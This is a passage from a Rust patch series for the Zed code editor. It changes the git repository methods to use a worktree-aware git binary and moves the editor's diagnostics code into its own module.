.build_command(&["cat-file", "--batch-check=%(objectname)"]) .stdin(Stdio::piped()) @@ -1678,7 +1685,7 @@ impl GitRepository for RealGitRepository { } fn status(&self, path_prefixes: &[RepoPath]) -> Task> { - let git = match self.git_binary() { + let git = match self.git_binary_in_worktree() { Ok(git) => git, Err(e) => return Task::ready(Err(e)), }; @@ -1697,7 +1704,7 @@ impl GitRepository for RealGitRepository { } fn diff_tree(&self, request: DiffTreeType) -> BoxFuture<'_, Result> { - let git = match self.git_binary() { + let git = match self.git_binary_in_worktree() { Ok(git) => git, Err(e) => return Task::ready(Err(e)).boxed(), }; @@ -1735,7 +1742,7 @@ impl GitRepository for RealGitRepository { } fn stash_entries(&self) -> BoxFuture<'_, Result> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { let git = git_binary?; @@ -1755,7 +1762,7 @@ impl GitRepository for RealGitRepository { } fn branches(&self) -> BoxFuture<'_, Result>> { - let git_binary = self.git_binary(); + let git = self.git_binary(); self.executor .spawn(async move { let fields = [ @@ -1777,7 +1784,6 @@ impl GitRepository for RealGitRepository { "--format", &fields, ]; - let git = git_binary?; let output = git.build_command(&args).output().await?; anyhow::ensure!( @@ -1814,7 +1820,7 @@ impl GitRepository for RealGitRepository { } fn worktrees(&self) -> BoxFuture<'_, Result>> { - let git_binary = self.git_binary(); + let git = self.git_binary(); let main_worktree_path = { let repo = self.repository.lock(); let common_dir = repo.commondir().to_path_buf(); @@ -1822,7 +1828,6 @@ impl GitRepository for RealGitRepository { }; self.executor .spawn(async move { - let git = git_binary?; let output = git .build_command(&["worktree", "list", "--porcelain"]) .output() @@ -1846,7 +1851,7 @@ impl GitRepository for RealGitRepository { target: CreateWorktreeTarget, path: PathBuf, ) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git = self.git_binary(); let mut args = vec![OsString::from("worktree"), OsString::from("add")]; match &target { @@ -1878,7 +1883,6 @@ impl GitRepository for RealGitRepository { self.executor .spawn(async move { std::fs::create_dir_all(path.parent().unwrap_or(&path))?; - let git = git_binary?; let output = git.build_command(&args).output().await?; if output.status.success() { Ok(()) @@ -1891,7 +1895,7 @@ impl GitRepository for RealGitRepository { } fn remove_worktree(&self, path: PathBuf, force: bool) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git = self.git_binary(); self.executor .spawn(async move { @@ -1901,14 +1905,14 @@ impl GitRepository for RealGitRepository { } args.push("--".into()); args.push(path.as_os_str().into()); - git_binary?.run(&args).await?; + git.run(&args).await?; anyhow::Ok(()) }) .boxed() } fn rename_worktree(&self, old_path: PathBuf, new_path: PathBuf) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git = self.git_binary(); self.executor .spawn(async move { @@ -1919,7 +1923,7 @@ impl GitRepository for RealGitRepository { old_path.as_os_str().into(), new_path.as_os_str().into(), ]; - git_binary?.run(&args).await?; + git.run(&args).await?; anyhow::Ok(()) }) .boxed() @@ -1953,7 +1957,7 @@ impl GitRepository for RealGitRepository { fn change_branch(&self, name: String) -> BoxFuture<'_, Result<()>> { let repo = self.repository.clone(); - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); let branch = self.executor.spawn(async move { let repo = repo.lock(); let branch = if let Ok(branch) = repo.find_branch(&name, BranchType::Local) { @@ -1999,7 +2003,7 @@ impl GitRepository for RealGitRepository { name: String, base_branch: Option, ) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { @@ -2017,7 +2021,7 @@ impl GitRepository for RealGitRepository { } fn rename_branch(&self, branch: String, new_name: String) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { @@ -2030,7 +2034,7 @@ impl GitRepository for RealGitRepository { } fn delete_branch(&self, is_remote: bool, name: String) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { @@ -2048,7 +2052,7 @@ impl GitRepository for RealGitRepository { content: Rope, line_ending: LineEnding, ) -> BoxFuture<'_, Result> { - let git = self.git_binary(); + let git = self.git_binary_in_worktree(); self.executor .spawn(async move { @@ -2058,7 +2062,7 @@ impl GitRepository for RealGitRepository { } fn diff(&self, diff: DiffType) -> BoxFuture<'_, Result> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { let git = git_binary?; @@ -2089,7 +2093,7 @@ impl GitRepository for RealGitRepository { path_prefixes: &[RepoPath], ) -> BoxFuture<'_, Result> { let path_prefixes = path_prefixes.to_vec(); - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { @@ -2119,7 +2123,7 @@ impl GitRepository for RealGitRepository { paths: Vec, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { if !paths.is_empty() { @@ -2146,7 +2150,7 @@ impl GitRepository for RealGitRepository { paths: Vec, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { @@ -2175,7 +2179,7 @@ impl GitRepository for RealGitRepository { paths: Vec, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { let git = git_binary?; @@ -2201,7 +2205,7 @@ impl GitRepository for RealGitRepository { index: Option, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { let git = git_binary?; @@ -2226,7 +2230,7 @@ impl GitRepository for RealGitRepository { index: Option, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { let git = git_binary?; @@ -2251,7 +2255,7 @@ impl GitRepository for RealGitRepository { index: Option, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { let git = git_binary?; @@ -2279,7 +2283,7 @@ impl GitRepository for RealGitRepository { ask_pass: AskPassDelegate, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); let executor = self.executor.clone(); // Note: Do not spawn this command on the background thread, it might pop open the credential helper // which we want to block on. @@ -2325,11 +2329,11 @@ impl GitRepository for RealGitRepository { } fn repair_worktrees(&self) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git = self.git_binary(); self.executor .spawn(async move { let args: Vec = vec!["worktree".into(), "repair".into()]; - git_binary?.run(&args).await?; + git.run(&args).await?; Ok(()) }) .boxed() @@ -2431,7 +2435,7 @@ impl GitRepository for RealGitRepository { env: Arc>, cx: AsyncApp, ) -> BoxFuture<'_, Result> { - let working_directory = self.working_directory(); + let working_directory = self.working_directory().unwrap_or(self.path()); let git_directory = self.path(); let remote_name = format!("{}", fetch_options); let git_binary_path = self.system_git_binary_path.clone(); @@ -2441,7 +2445,6 @@ impl GitRepository for RealGitRepository { // which we want to block on. async move { let git_binary_path = git_binary_path.context("git not found on $PATH, can't fetch")?; - let working_directory = working_directory?; let git = GitBinary::new( git_binary_path, working_directory, @@ -2461,10 +2464,9 @@ impl GitRepository for RealGitRepository { } fn get_push_remote(&self, branch: String) -> BoxFuture<'_, Result>> { - let git_binary = self.git_binary(); + let git = self.git_binary(); self.executor .spawn(async move { - let git = git_binary?; let output = git .build_command(&["rev-parse", "--abbrev-ref"]) .arg(format!("{branch}@{{push}}")) @@ -2486,10 +2488,9 @@ impl GitRepository for RealGitRepository { } fn get_branch_remote(&self, branch: String) -> BoxFuture<'_, Result>> { - let git_binary = self.git_binary(); + let git = self.git_binary(); self.executor .spawn(async move { - let git = git_binary?; let output = git .build_command(&["config", "--get"]) .arg(format!("branch.{branch}.remote")) @@ -2508,10 +2509,9 @@ impl GitRepository for RealGitRepository { } fn get_all_remotes(&self) -> BoxFuture<'_, Result>> { - let git_binary = self.git_binary(); + let git = self.git_binary(); self.executor .spawn(async move { - let git = git_binary?; let output = git.build_command(&["remote", "-v"]).output().await?; anyhow::ensure!( @@ -2561,7 +2561,7 @@ impl GitRepository for RealGitRepository { } fn check_for_pushed_commit(&self) -> BoxFuture<'_, Result>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { let git = git_binary?; @@ -2615,7 +2615,7 @@ impl GitRepository for RealGitRepository { } fn checkpoint(&self) -> BoxFuture<'static, Result> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { let mut git = git_binary?.envs(checkpoint_author_envs()); @@ -2644,7 +2644,7 @@ impl GitRepository for RealGitRepository { } fn restore_checkpoint(&self, checkpoint: GitRepositoryCheckpoint) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { let git = git_binary?; @@ -2674,7 +2674,7 @@ impl GitRepository for RealGitRepository { } fn create_archive_checkpoint(&self) -> BoxFuture<'_, Result<(String, String)>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { let mut git = git_binary?.envs(checkpoint_author_envs()); @@ -2732,7 +2732,7 @@ impl GitRepository for RealGitRepository { staged_sha: String, unstaged_sha: String, ) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { let git = git_binary?; @@ -2762,7 +2762,7 @@ impl GitRepository for RealGitRepository { left: GitRepositoryCheckpoint, right: GitRepositoryCheckpoint, ) -> BoxFuture<'_, Result> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { let git = git_binary?; @@ -2796,7 +2796,7 @@ impl GitRepository for RealGitRepository { base_checkpoint: GitRepositoryCheckpoint, target_checkpoint: GitRepositoryCheckpoint, ) -> BoxFuture<'_, Result> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { let git = git_binary?; @@ -2816,11 +2816,9 @@ impl GitRepository for RealGitRepository { &self, include_remote_name: bool, ) -> BoxFuture<'_, Result>> { - let git_binary = self.git_binary(); + let git = self.git_binary(); self.executor .spawn(async move { - let git = git_binary?; - let strip_prefix = if include_remote_name { "refs/remotes/" } else { @@ -2869,7 +2867,7 @@ impl GitRepository for RealGitRepository { hook: RunHook, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); let repository = self.repository.clone(); let help_output = self.any_git_binary_help_output(); @@ -2922,11 +2920,9 @@ impl GitRepository for RealGitRepository { log_order: LogOrder, request_tx: Sender>>, ) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git = self.git_binary(); async move { - let git = git_binary?; - let mut git_log_command = vec![ "log", GRAPH_COMMIT_FORMAT, @@ -3004,11 +3000,9 @@ impl GitRepository for RealGitRepository { search_args: SearchCommitArgs, request_tx: Sender, ) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git = self.git_binary(); async move { - let git = git_binary?; - let mut args = vec!["log", SEARCH_COMMIT_FORMAT, log_source.get_arg()?]; args.push("--fixed-strings"); @@ -3058,7 +3052,7 @@ impl GitRepository for RealGitRepository { } fn commit_data_reader(&self) -> Result { - let git_binary = self.git_binary()?; + let git_binary = self.git_binary(); let (request_tx, request_rx) = async_channel::bounded::(64); From 013646188f72306672ca5c099742c41509e28cb2 Mon Sep 17 00:00:00 2001 From: Mikhail Pertsev Date: Tue, 5 May 2026 17:52:45 +0200 Subject: [PATCH 202/231] editor: Extract Diagnostics code out of `editor.rs` (#55747) cc @SomeoneToIgnore ## Summary Follow-up to https://github.com/zed-industries/zed/discussions/55352, where the conclusion was to split `editor.rs` incrementally by topic instead of all at once. This mechanically extracts diagnostics-related editor code into `crates/editor/src/editor/diagnostics.rs` while preserving the existing public API via re-exports. ## Testing - `cargo check -p editor --lib` - `cargo check -p diagnostics --lib` - `cargo check -p diagnostics --tests` Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --- crates/diagnostics/src/diagnostics_tests.rs | 8 +- crates/editor/src/display_map.rs | 16 +- crates/editor/src/editor.rs | 513 +------------------ crates/editor/src/editor/diagnostics.rs | 519 ++++++++++++++++++++ crates/editor/src/element.rs | 21 +- crates/editor/src/hover_popover.rs | 12 +- 6 files changed, 553 insertions(+), 536 deletions(-) create mode 100644 crates/editor/src/editor/diagnostics.rs diff --git a/crates/diagnostics/src/diagnostics_tests.rs b/crates/diagnostics/src/diagnostics_tests.rs index 527f5b5bfcbfa2..c587e61c4f470a 100644 --- a/crates/diagnostics/src/diagnostics_tests.rs +++ b/crates/diagnostics/src/diagnostics_tests.rs @@ -1037,9 +1037,7 @@ async fn active_diagnostics_dismiss_after_invalidation(cx: &mut TestAppContext) cx.update_editor(|editor, window, cx| { editor.go_to_diagnostic(&GoToDiagnostic::default(), window, cx); assert_eq!( - editor - .active_diagnostic_group() - .map(|diagnostics_group| diagnostics_group.active_message.as_str()), + editor.active_diagnostic_message(), Some(message), "Should have a diagnostics group activated" ); @@ -1069,7 +1067,7 @@ async fn active_diagnostics_dismiss_after_invalidation(cx: &mut TestAppContext) }); cx.run_until_parked(); cx.update_editor(|editor, _, _| { - assert_eq!(editor.active_diagnostic_group(), None); + assert_eq!(editor.active_diagnostic_message(), None); }); cx.assert_editor_state(indoc! {" fn func(abcˇ def: i32) -> u32 { @@ -1078,7 +1076,7 @@ async fn active_diagnostics_dismiss_after_invalidation(cx: &mut TestAppContext) cx.update_editor(|editor, window, cx| { editor.go_to_diagnostic(&GoToDiagnostic::default(), window, cx); - assert_eq!(editor.active_diagnostic_group(), None); + assert_eq!(editor.active_diagnostic_message(), None); }); cx.assert_editor_state(indoc! {" fn func(abcˇ def: i32) -> u32 { diff --git a/crates/editor/src/display_map.rs b/crates/editor/src/display_map.rs index 552eca261e9786..db01bbb178694f 100644 --- a/crates/editor/src/display_map.rs +++ b/crates/editor/src/display_map.rs @@ -94,7 +94,7 @@ pub use wrap_map::{WrapPoint, WrapRow, WrapSnapshot}; use collections::{HashMap, HashSet, IndexSet}; use gpui::{ - App, Context, Entity, EntityId, Font, HighlightStyle, LineLayout, Pixels, UnderlineStyle, + App, Context, Entity, EntityId, Font, HighlightStyle, Hsla, LineLayout, Pixels, UnderlineStyle, WeakEntity, }; use language::{ @@ -113,6 +113,7 @@ use settings::Settings; use smallvec::SmallVec; use sum_tree::{Bias, TreeMap}; use text::{BufferId, LineIndent, Patch}; +use theme::StatusColors; use ui::{SharedString, px}; use unicode_segmentation::UnicodeSegmentation; use ztracing::instrument; @@ -1848,8 +1849,7 @@ impl DisplaySnapshot { && editor_style.show_underlines && !(chunk.is_unnecessary && severity > lsp::DiagnosticSeverity::WARNING)) .then(|| { - let diagnostic_color = - super::diagnostic_style(severity, &editor_style.status); + let diagnostic_color = diagnostic_style(severity, &editor_style.status); UnderlineStyle { color: Some(diagnostic_color), thickness: 1.0.into(), @@ -2414,6 +2414,16 @@ impl DisplaySnapshot { } } +fn diagnostic_style(severity: lsp::DiagnosticSeverity, colors: &StatusColors) -> Hsla { + match severity { + lsp::DiagnosticSeverity::ERROR => colors.error, + lsp::DiagnosticSeverity::WARNING => colors.warning, + lsp::DiagnosticSeverity::INFORMATION => colors.info, + lsp::DiagnosticSeverity::HINT => colors.hint, + _ => colors.ignored, + } +} + impl std::ops::Deref for DisplaySnapshot { type Target = BlockSnapshot; diff --git a/crates/editor/src/editor.rs b/crates/editor/src/editor.rs index a57b705856040b..649ffbfae8aa8f 100644 --- a/crates/editor/src/editor.rs +++ b/crates/editor/src/editor.rs @@ -57,7 +57,12 @@ mod signature_help; #[cfg(any(test, feature = "test-support"))] pub mod test; +#[path = "editor/diagnostics.rs"] +mod diagnostics; + pub(crate) use actions::*; +use diagnostics::{ActiveDiagnostic, GlobalDiagnosticRenderer, InlineDiagnostic}; +pub use diagnostics::{DiagnosticRenderer, set_diagnostic_renderer}; pub use display_map::{ ChunkRenderer, ChunkRendererContext, DisplayPoint, FoldPlaceholder, HighlightKey, NavigationOverlayKey, SemanticTokenHighlight, @@ -390,48 +395,6 @@ pub fn set_blame_renderer(renderer: impl BlameRenderer + 'static, cx: &mut App) cx.set_global(GlobalBlameRenderer(Arc::new(renderer))); } -pub trait DiagnosticRenderer { - fn render_group( - &self, - diagnostic_group: Vec>, - buffer_id: BufferId, - snapshot: EditorSnapshot, - editor: WeakEntity, - language_registry: Option>, - cx: &mut App, - ) -> Vec>; - - fn render_hover( - &self, - diagnostic_group: Vec>, - range: Range, - buffer_id: BufferId, - language_registry: Option>, - cx: &mut App, - ) -> Option>; - - fn open_link( - &self, - editor: &mut Editor, - link: SharedString, - window: &mut Window, - cx: &mut Context, - ); -} - -pub(crate) struct GlobalDiagnosticRenderer(pub Arc); - -impl GlobalDiagnosticRenderer { - fn global(cx: &App) -> Option> { - cx.try_global::().map(|g| g.0.clone()) - } -} - -impl gpui::Global for GlobalDiagnosticRenderer {} -pub fn set_diagnostic_renderer(renderer: impl DiagnosticRenderer + 'static, cx: &mut App) { - cx.set_global(GlobalDiagnosticRenderer(Arc::new(renderer))); -} - pub struct SearchWithinRange; trait InvalidationRegion { @@ -678,15 +641,6 @@ enum EditPredictionSettings { }, } -#[derive(Debug, Clone)] -struct InlineDiagnostic { - message: SharedString, - group_id: usize, - is_primary: bool, - start: Point, - severity: lsp::DiagnosticSeverity, -} - pub enum MenuEditPredictionsPolicy { Never, ByProvider, @@ -1771,22 +1725,6 @@ struct RegisteredEditPredictionDelegate { _subscription: Subscription, } -#[derive(Debug, PartialEq, Eq)] -pub struct ActiveDiagnosticGroup { - pub active_range: Range, - pub active_message: String, - pub group_id: usize, - pub blocks: HashSet, -} - -#[derive(Debug, PartialEq, Eq)] - -pub(crate) enum ActiveDiagnostic { - None, - All, - Group(ActiveDiagnosticGroup), -} - #[derive(Serialize, Deserialize, Clone, Debug)] pub struct ClipboardSelection { /// The number of bytes in this selection. @@ -4713,7 +4651,7 @@ impl Editor { dismissed = true; } - if self.mode.is_full() && matches!(self.active_diagnostics, ActiveDiagnostic::Group(_)) { + if self.mode.is_full() && self.has_active_diagnostic_group() { self.dismiss_diagnostics(cx); dismissed = true; } @@ -18249,123 +18187,6 @@ impl Editor { ); } - pub fn go_to_diagnostic( - &mut self, - action: &GoToDiagnostic, - window: &mut Window, - cx: &mut Context, - ) { - if !self.diagnostics_enabled() { - return; - } - self.go_to_diagnostic_impl(Direction::Next, action.severity, window, cx) - } - - pub fn go_to_prev_diagnostic( - &mut self, - action: &GoToPreviousDiagnostic, - window: &mut Window, - cx: &mut Context, - ) { - if !self.diagnostics_enabled() { - return; - } - self.go_to_diagnostic_impl(Direction::Prev, action.severity, window, cx) - } - - pub fn go_to_diagnostic_impl( - &mut self, - direction: Direction, - severity: GoToDiagnosticSeverityFilter, - window: &mut Window, - cx: &mut Context, - ) { - let buffer = self.buffer.read(cx).snapshot(cx); - let selection = self - .selections - .newest::(&self.display_snapshot(cx)); - - let mut active_group_id = None; - if let ActiveDiagnostic::Group(active_group) = &self.active_diagnostics - && active_group.active_range.start.to_offset(&buffer) == selection.start - { - active_group_id = Some(active_group.group_id); - } - - fn filtered<'a>( - severity: GoToDiagnosticSeverityFilter, - diagnostics: impl Iterator>, - ) -> impl Iterator> { - diagnostics - .filter(move |entry| severity.matches(entry.diagnostic.severity)) - .filter(|entry| entry.range.start != entry.range.end) - .filter(|entry| !entry.diagnostic.is_unnecessary) - } - - let before = filtered( - severity, - buffer - .diagnostics_in_range(MultiBufferOffset(0)..selection.start) - .filter(|entry| entry.range.start <= selection.start), - ); - let after = filtered( - severity, - buffer - .diagnostics_in_range(selection.start..buffer.len()) - .filter(|entry| entry.range.start >= selection.start), - ); - - let mut found: Option> = None; - if direction == Direction::Prev { - 'outer: for prev_diagnostics in [before.collect::>(), after.collect::>()] - { - for diagnostic in prev_diagnostics.into_iter().rev() { - if diagnostic.range.start != selection.start - || active_group_id - .is_some_and(|active| diagnostic.diagnostic.group_id < active) - { - found = Some(diagnostic); - break 'outer; - } - } - } - } else { - for diagnostic in after.chain(before) { - if diagnostic.range.start != selection.start - || active_group_id.is_some_and(|active| diagnostic.diagnostic.group_id > active) - { - found = Some(diagnostic); - break; - } - } - } - let Some(next_diagnostic) = found else { - return; - }; - - let next_diagnostic_start = buffer.anchor_after(next_diagnostic.range.start); - let Some((buffer_anchor, _)) = buffer.anchor_to_buffer_anchor(next_diagnostic_start) else { - return; - }; - let buffer_id = buffer_anchor.buffer_id; - let snapshot = self.snapshot(window, cx); - if snapshot.intersects_fold(next_diagnostic.range.start) { - self.unfold_ranges( - std::slice::from_ref(&next_diagnostic.range), - true, - false, - cx, - ); - } - self.change_selections(Default::default(), window, cx, |s| { - s.select_ranges(vec![ - next_diagnostic.range.start..next_diagnostic.range.start, - ]) - }); - self.activate_diagnostics(buffer_id, next_diagnostic, window, cx); - self.refresh_edit_prediction(false, true, window, cx); - } - pub fn go_to_next_hunk(&mut self, _: &GoToHunk, window: &mut Window, cx: &mut Context) { let snapshot = self.snapshot(window, cx); let selection = self.selections.newest::(&self.display_snapshot(cx)); @@ -20303,183 +20124,10 @@ impl Editor { window.show_character_palette(); } - fn refresh_active_diagnostics(&mut self, cx: &mut Context) { - if !self.diagnostics_enabled() { - return; - } - - if let ActiveDiagnostic::Group(active_diagnostics) = &mut self.active_diagnostics { - let buffer = self.buffer.read(cx).snapshot(cx); - let primary_range_start = active_diagnostics.active_range.start.to_offset(&buffer); - let primary_range_end = active_diagnostics.active_range.end.to_offset(&buffer); - let is_valid = buffer - .diagnostics_in_range::(primary_range_start..primary_range_end) - .any(|entry| { - entry.diagnostic.is_primary - && !entry.range.is_empty() - && entry.range.start == primary_range_start - && entry.diagnostic.message == active_diagnostics.active_message - }); - - if !is_valid { - self.dismiss_diagnostics(cx); - } - } - } - - pub fn active_diagnostic_group(&self) -> Option<&ActiveDiagnosticGroup> { - match &self.active_diagnostics { - ActiveDiagnostic::Group(group) => Some(group), - _ => None, - } - } - - pub fn set_all_diagnostics_active(&mut self, cx: &mut Context) { - if !self.diagnostics_enabled() { - return; - } - self.dismiss_diagnostics(cx); - self.active_diagnostics = ActiveDiagnostic::All; - } - - fn activate_diagnostics( - &mut self, - buffer_id: BufferId, - diagnostic: DiagnosticEntryRef<'_, MultiBufferOffset>, - window: &mut Window, - cx: &mut Context, - ) { - if !self.diagnostics_enabled() || matches!(self.active_diagnostics, ActiveDiagnostic::All) { - return; - } - self.dismiss_diagnostics(cx); - let snapshot = self.snapshot(window, cx); - let buffer = self.buffer.read(cx).snapshot(cx); - let Some(renderer) = GlobalDiagnosticRenderer::global(cx) else { - return; - }; - - let diagnostic_group = buffer - .diagnostic_group(buffer_id, diagnostic.diagnostic.group_id) - .collect::>(); - - let language_registry = self - .project() - .map(|project| project.read(cx).languages().clone()); - - let blocks = renderer.render_group( - diagnostic_group, - buffer_id, - snapshot, - cx.weak_entity(), - language_registry, - cx, - ); - - let blocks = self.display_map.update(cx, |display_map, cx| { - display_map.insert_blocks(blocks, cx).into_iter().collect() - }); - self.active_diagnostics = ActiveDiagnostic::Group(ActiveDiagnosticGroup { - active_range: buffer.anchor_before(diagnostic.range.start) - ..buffer.anchor_after(diagnostic.range.end), - active_message: diagnostic.diagnostic.message.clone(), - group_id: diagnostic.diagnostic.group_id, - blocks, - }); - cx.notify(); - } - - fn dismiss_diagnostics(&mut self, cx: &mut Context) { - if matches!(self.active_diagnostics, ActiveDiagnostic::All) { - return; - }; - - let prev = mem::replace(&mut self.active_diagnostics, ActiveDiagnostic::None); - if let ActiveDiagnostic::Group(group) = prev { - self.display_map.update(cx, |display_map, cx| { - display_map.remove_blocks(group.blocks, cx); - }); - cx.notify(); - } - } - - /// Disable inline diagnostics rendering for this editor. - pub fn disable_inline_diagnostics(&mut self) { - self.inline_diagnostics_enabled = false; - self.inline_diagnostics_update = Task::ready(()); - self.inline_diagnostics.clear(); - } - - pub fn disable_diagnostics(&mut self, cx: &mut Context) { - self.diagnostics_enabled = false; - self.dismiss_diagnostics(cx); - self.inline_diagnostics_update = Task::ready(()); - self.inline_diagnostics.clear(); - } - pub fn disable_word_completions(&mut self) { self.word_completions_enabled = false; } - pub fn diagnostics_enabled(&self) -> bool { - self.diagnostics_enabled && self.lsp_data_enabled() - } - - pub fn inline_diagnostics_enabled(&self) -> bool { - self.inline_diagnostics_enabled && self.diagnostics_enabled() - } - - pub fn show_inline_diagnostics(&self) -> bool { - self.show_inline_diagnostics - } - - pub fn toggle_inline_diagnostics( - &mut self, - _: &ToggleInlineDiagnostics, - window: &mut Window, - cx: &mut Context, - ) { - self.show_inline_diagnostics = !self.show_inline_diagnostics; - self.refresh_inline_diagnostics(false, window, cx); - } - - pub fn set_max_diagnostics_severity(&mut self, severity: DiagnosticSeverity, cx: &mut App) { - self.diagnostics_max_severity = severity; - self.display_map.update(cx, |display_map, _| { - display_map.diagnostics_max_severity = self.diagnostics_max_severity; - }); - } - - pub fn toggle_diagnostics( - &mut self, - _: &ToggleDiagnostics, - window: &mut Window, - cx: &mut Context, - ) { - let diagnostics_enabled = - self.diagnostics_enabled() && self.diagnostics_max_severity != DiagnosticSeverity::Off; - self.diagnostics_enabled = !diagnostics_enabled; - - let new_severity = if self.diagnostics_enabled { - EditorSettings::get_global(cx) - .diagnostics_max_severity - .filter(|severity| severity != &DiagnosticSeverity::Off) - .unwrap_or(DiagnosticSeverity::Hint) - } else { - DiagnosticSeverity::Off - }; - self.set_max_diagnostics_severity(new_severity, cx); - if self.diagnostics_enabled { - self.active_diagnostics = ActiveDiagnostic::None; - self.inline_diagnostics_update = Task::ready(()); - self.inline_diagnostics.clear(); - } else { - self.refresh_inline_diagnostics(false, window, cx); - } - - cx.notify(); - } - pub fn toggle_minimap( &mut self, _: &ToggleMinimap, @@ -20491,135 +20139,6 @@ impl Editor { } } - fn refresh_inline_diagnostics( - &mut self, - debounce: bool, - window: &mut Window, - cx: &mut Context, - ) { - let max_severity = ProjectSettings::get_global(cx) - .diagnostics - .inline - .max_severity - .unwrap_or(self.diagnostics_max_severity); - - if !self.inline_diagnostics_enabled() - || !self.diagnostics_enabled() - || !self.show_inline_diagnostics - || max_severity == DiagnosticSeverity::Off - { - self.inline_diagnostics_update = Task::ready(()); - self.inline_diagnostics.clear(); - return; - } - - let debounce_ms = ProjectSettings::get_global(cx) - .diagnostics - .inline - .update_debounce_ms; - let debounce = if debounce && debounce_ms > 0 { - Some(Duration::from_millis(debounce_ms)) - } else { - None - }; - self.inline_diagnostics_update = cx.spawn_in(window, async move |editor, cx| { - if let Some(debounce) = debounce { - cx.background_executor().timer(debounce).await; - } - let Some(snapshot) = editor.upgrade().map(|editor| { - editor.update(cx, |editor, cx| editor.buffer().read(cx).snapshot(cx)) - }) else { - return; - }; - - let new_inline_diagnostics = cx - .background_spawn(async move { - let mut inline_diagnostics = Vec::<(Anchor, InlineDiagnostic)>::new(); - for diagnostic_entry in - snapshot.diagnostics_in_range(MultiBufferOffset(0)..snapshot.len()) - { - let message = diagnostic_entry - .diagnostic - .message - .split_once('\n') - .map(|(line, _)| line) - .map(SharedString::new) - .unwrap_or_else(|| { - SharedString::new(&*diagnostic_entry.diagnostic.message) - }); - let start_anchor = snapshot.anchor_before(diagnostic_entry.range.start); - let (Ok(i) | Err(i)) = inline_diagnostics - .binary_search_by(|(probe, _)| probe.cmp(&start_anchor, &snapshot)); - inline_diagnostics.insert( - i, - ( - start_anchor, - InlineDiagnostic { - message, - group_id: diagnostic_entry.diagnostic.group_id, - start: diagnostic_entry.range.start.to_point(&snapshot), - is_primary: diagnostic_entry.diagnostic.is_primary, - severity: diagnostic_entry.diagnostic.severity, - }, - ), - ); - } - inline_diagnostics - }) - .await; - - editor - .update(cx, |editor, cx| { - editor.inline_diagnostics = new_inline_diagnostics; - cx.notify(); - }) - .ok(); - }); - } - - fn pull_diagnostics( - &mut self, - buffer_id: BufferId, - _window: &Window, - cx: &mut Context, - ) -> Option<()> { - // `ActiveDiagnostic::All` is a special mode where editor's diagnostics are managed by the external view, - // skip any LSP updates for it. - - if self.active_diagnostics == ActiveDiagnostic::All || !self.diagnostics_enabled() { - return None; - } - let pull_diagnostics_settings = ProjectSettings::get_global(cx) - .diagnostics - .lsp_pull_diagnostics; - if !pull_diagnostics_settings.enabled { - return None; - } - let debounce = Duration::from_millis(pull_diagnostics_settings.debounce_ms); - let project = self.project()?.downgrade(); - let buffer = self.buffer().read(cx).buffer(buffer_id)?; - - self.pull_diagnostics_task = cx.spawn(async move |_, cx| { - cx.background_executor().timer(debounce).await; - if let Ok(task) = project.update(cx, |project, cx| { - project.lsp_store().update(cx, |lsp_store, cx| { - lsp_store.pull_diagnostics_for_buffer(buffer, cx) - }) - }) { - task.await.log_err(); - } - project - .update(cx, |project, cx| { - project.lsp_store().update(cx, |lsp_store, cx| { - lsp_store.pull_document_diagnostics_for_buffer_edit(buffer_id, cx); - }) - }) - .log_err(); - }); - - Some(()) - } - pub fn set_selections_from_remote( &mut self, 